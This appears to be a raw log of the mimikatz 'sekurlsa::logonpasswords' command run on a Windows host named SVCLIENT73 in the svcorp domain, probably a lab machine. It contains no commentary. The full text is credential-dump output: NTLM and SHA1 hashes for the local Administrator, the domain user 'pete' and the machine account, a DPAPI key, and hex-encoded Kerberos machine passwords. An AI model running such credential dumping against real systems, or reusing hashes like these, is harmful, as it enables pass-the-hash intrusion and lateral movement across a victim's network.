mimikatz # sekurlsa::logonpasswords

Authentication Id : 0 ; 627053 (00000000:0009916d)
Session           : Interactive from 0
User Name         : Administrator
Domain            : SVCLIENT73
Logon Server      : SVCLIENT73
Logon Time        : 31/03/2021 22:02:33
SID               : S-1-5-21-5689513-2783704404-2070145878-500
        msv :
         [00000003] Primary
         * Username : Administrator
         * Domain   : SVCLIENT73
         * NTLM     : ee0c207898a5bccc01f38115019ca2fb
         * SHA1     : ef8a1ecb32d473d9d97d64d1eb5cd55efbb3d6bc
        tspkg :
        wdigest :
         * Username : Administrator
         * Domain   : SVCLIENT73
         * Password : (null)
        kerberos :
         * Username : Administrator
         * Domain   : SVCLIENT73
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 406975 (00000000:000635bf)
Session           : Interactive from 0
User Name         : Administrator
Domain            : SVCLIENT73
Logon Server      : SVCLIENT73
Logon Time        : 11/03/2021 00:42:30
SID               : S-1-5-21-5689513-2783704404-2070145878-500
        msv :
         [00000003] Primary
         * Username : Administrator
         * Domain   : SVCLIENT73
         * NTLM     : ee0c207898a5bccc01f38115019ca2fb
         * SHA1     : ef8a1ecb32d473d9d97d64d1eb5cd55efbb3d6bc
        tspkg :
        wdigest :
         * Username : Administrator
         * Domain   : SVCLIENT73
         * Password : (null)
        kerberos :
         * Username : Administrator
         * Domain   : SVCLIENT73
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 123759 (00000000:0001e36f)
Session           : Interactive from 1
User Name         : pete
Domain            : svcorp
Logon Server      : SV-DC01
Logon Time        : 11/03/2021 00:40:01
SID               : S-1-5-21-466546139-763938477-1796994327-1121
        msv :
         [00000003] Primary
         * Username : pete
         * Domain   : svcorp
         * NTLM     : 0f951bc4fdc5dfcd148161420b9c6207
         * SHA1     : 40100bec51af3d9ee79ebae0e4d553d8615bae53
         * DPAPI    : 1edbe411d0b75aed07b0d20c24f99631
        tspkg :
        wdigest :
         * Username : pete
         * Domain   : svcorp
         * Password : (null)
        kerberos :
         * Username : pete
         * Domain   : SVCORP.COM
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 11/03/2021 00:39:58
SID               : S-1-5-19
        msv :
        tspkg :
        wdigest :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        kerberos :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 51679 (00000000:0000c9df)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 11/03/2021 00:39:58
SID               : S-1-5-90-0-1
        msv :
         [00000003] Primary
         * Username : SVCLIENT73$
         * Domain   : svcorp
         * NTLM     : d88b95e656bec02cdeaa56b924d186c7
         * SHA1     : 202903b2a6152f3e6f9c09a9f6841c023f336d22
        tspkg :
        wdigest :
         * Username : SVCLIENT73$
         * Domain   : svcorp
         * Password : (null)
        kerberos :
         * Username : SVCLIENT73$
         * Domain   : svcorp.com
         * Password : 1a ae aa 11 7e c0 71 cf 4f d4 9a ac f6 8e 9a bd 7a d6 6f 48 da 41 6c 7a 66 cd 15 62 3d 14 8a 75 95 37 02 75 32 c6 c0 76 08 73 9e cf 7a 17 5e 7c 4d 07 1f a5 34 61 c3 8e 76 df 54 c9 c7 27 05 86 a2 36 ca f0 8f ed d4 1e 35 8b 8b a3 28 17 34 11 52 3b 06 62 e5 20 1c 28 cd e2 6c e6 52 a4 31 db 69 88 bb 2a 7b 46 30 20 61 dd af 9f ab 95 79 22 bd 60 ef 5e e6 df ef 50 26 ca f5 aa 06 3a d1 09 37 93 65 57 8e 28 1b 5f 10 d1 d5 bc bd 51 56 5b ab 00 06 6c 17 8c e7 e3 95 a3 55 5b 69 a4 fb ea 6e 9e 0a 5d 56 5c 9e 80 b0 f0 03 45 38 62 2b b2 bf bc fc d2 dc b6 4e 97 0a 63 1e 1f 54 79 5c e7 13 54 43 3c a3 72 9a 75 97 dd f9 4e 07 35 03 10 fd 79 1b 39 4a c9 ea 03 64 29 81 4d 58 ad b4 76 3d b8 ba 7c a5 26 4c a7 53 a5 5f d4 f1 bb 5a c7
        ssp :
        credman :

Authentication Id : 0 ; 50985 (00000000:0000c729)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 11/03/2021 00:39:58
SID               : S-1-5-90-0-1
        msv :
         [00000003] Primary
         * Username : SVCLIENT73$
         * Domain   : svcorp
         * NTLM     : 0c67bb72defda145f4c44fd3ac392e3d
         * SHA1     : 22fd9ca25bfa621afc9e9472fcbc9e87da0c54f4
        tspkg :
        wdigest :
         * Username : SVCLIENT73$
         * Domain   : svcorp
         * Password : (null)
        kerberos :
         * Username : SVCLIENT73$
         * Domain   : svcorp.com
         * Password : bb 18 b7 69 84 7d b7 a4 f3 a1 00 6a d1 9f f5 e0 db 01 32 0b 02 19 fd 31 a3 5b 97 fe 7d 2d c4 c1 95 d3 17 41 4b 11 4d 33 29 a8 e6 2c c2 26 6f 9b c7 09 0c 50 79 17 05 e1 b7 45 fa 59 44 d0 50 22 7b 28 3f 3c 2a 95 20 17 2f c6 6e 5d fd e6 b0 de 33 3e 78 b0 21 25 5c 05 25 37 37 4a 5c 65 df 89 53 98 7f 06 84 6d 24 61 86 79 0b 5a ac fa 65 82 b0 2a 82 0f 79 59 44 3d 43 03 e6 b1 9b 2b c8 df 1b 28 bf 36 eb a2 13 b9 0b d3 b0 19 f5 25 4d 78 7a 5e e0 1f 9e cc 65 ef ca 5d c1 01 1a fa 54 47 d1 97 c7 88 d8 7a b9 6e 83 57 f4 43 dd 60 fc c7 66 b2 58 5f 0f 5a b8 b1 28 ea 90 26 d7 de a1 45 a0 47 76 39 51 8a c3 8a 0e 32 f9 04 8c f8 bd 92 69 3c 4d 68 e0 16 d9 ce 9f 49 a8 0c f4 67 30 e2 31 80 66 fc c2 2c 9a 10 a3 29 39 bf da 48 8b 34
        ssp :
        credman :

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : SVCLIENT73$
Domain            : svcorp
Logon Server      : (null)
Logon Time        : 11/03/2021 00:39:58
SID               : S-1-5-20
        msv :
         [00000003] Primary
         * Username : SVCLIENT73$
         * Domain   : svcorp
         * NTLM     : 0c67bb72defda145f4c44fd3ac392e3d
         * SHA1     : 22fd9ca25bfa621afc9e9472fcbc9e87da0c54f4
        tspkg :
        wdigest :
         * Username : SVCLIENT73$
         * Domain   : svcorp
         * Password : (null)
        kerberos :
         * Username : svclient73$
         * Domain   : SVCORP.COM
         * Password : bb 18 b7 69 84 7d b7 a4 f3 a1 00 6a d1 9f f5 e0 db 01 32 0b 02 19 fd 31 a3 5b 97 fe 7d 2d c4 c1 95 d3 17 41 4b 11 4d 33 29 a8 e6 2c c2 26 6f 9b c7 09 0c 50 79 17 05 e1 b7 45 fa 59 44 d0 50 22 7b 28 3f 3c 2a 95 20 17 2f c6 6e 5d fd e6 b0 de 33 3e 78 b0 21 25 5c 05 25 37 37 4a 5c 65 df 89 53 98 7f 06 84 6d 24 61 86 79 0b 5a ac fa 65 82 b0 2a 82 0f 79 59 44 3d 43 03 e6 b1 9b 2b c8 df 1b 28 bf 36 eb a2 13 b9 0b d3 b0 19 f5 25 4d 78 7a 5e e0 1f 9e cc 65 ef ca 5d c1 01 1a fa 54 47 d1 97 c7 88 d8 7a b9 6e 83 57 f4 43 dd 60 fc c7 66 b2 58 5f 0f 5a b8 b1 28 ea 90 26 d7 de a1 45 a0 47 76 39 51 8a c3 8a 0e 32 f9 04 8c f8 bd 92 69 3c 4d 68 e0 16 d9 ce 9f 49 a8 0c f4 67 30 e2 31 80 66 fc c2 2c 9a 10 a3 29 39 bf da 48 8b 34
        ssp :
        credman :

Authentication Id : 0 ; 29980 (00000000:0000751c)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 11/03/2021 00:39:58
SID               :
        msv :
         [00000003] Primary
         * Username : SVCLIENT73$
         * Domain   : svcorp
         * NTLM     : 0c67bb72defda145f4c44fd3ac392e3d
         * SHA1     : 22fd9ca25bfa621afc9e9472fcbc9e87da0c54f4
        tspkg :
        wdigest :
        kerberos :
        ssp :
        credman :

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : SVCLIENT73$
Domain            : svcorp
Logon Server      : (null)
Logon Time        : 11/03/2021 00:39:58
SID               : S-1-5-18
        msv :
        tspkg :
        wdigest :
         * Username : SVCLIENT73$
         * Domain   : svcorp
         * Password : (null)
        kerberos :
         * Username : svclient73$
         * Domain   : SVCORP.COM
         * Password : bb 18 b7 69 84 7d b7 a4 f3 a1 00 6a d1 9f f5 e0 db 01 32 0b 02 19 fd 31 a3 5b 97 fe 7d 2d c4 c1 95 d3 17 41 4b 11 4d 33 29 a8 e6 2c c2 26 6f 9b c7 09 0c 50 79 17 05 e1 b7 45 fa 59 44 d0 50 22 7b 28 3f 3c 2a 95 20 17 2f c6 6e 5d fd e6 b0 de 33 3e 78 b0 21 25 5c 05 25 37 37 4a 5c 65 df 89 53 98 7f 06 84 6d 24 61 86 79 0b 5a ac fa 65 82 b0 2a 82 0f 79 59 44 3d 43 03 e6 b1 9b 2b c8 df 1b 28 bf 36 eb a2 13 b9 0b d3 b0 19 f5 25 4d 78 7a 5e e0 1f 9e cc 65 ef ca 5d c1 01 1a fa 54 47 d1 97 c7 88 d8 7a b9 6e 83 57 f4 43 dd 60 fc c7 66 b2 58 5f 0f 5a b8 b1 28 ea 90 26 d7 de a1 45 a0 47 76 39 51 8a c3 8a 0e 32 f9 04 8c f8 bd 92 69 3c 4d 68 e0 16 d9 ce 9f 49 a8 0c f4 67 30 e2 31 80 66 fc c2 2c 9a 10 a3 29 39 bf da 48 8b 34
        ssp :
        credman :
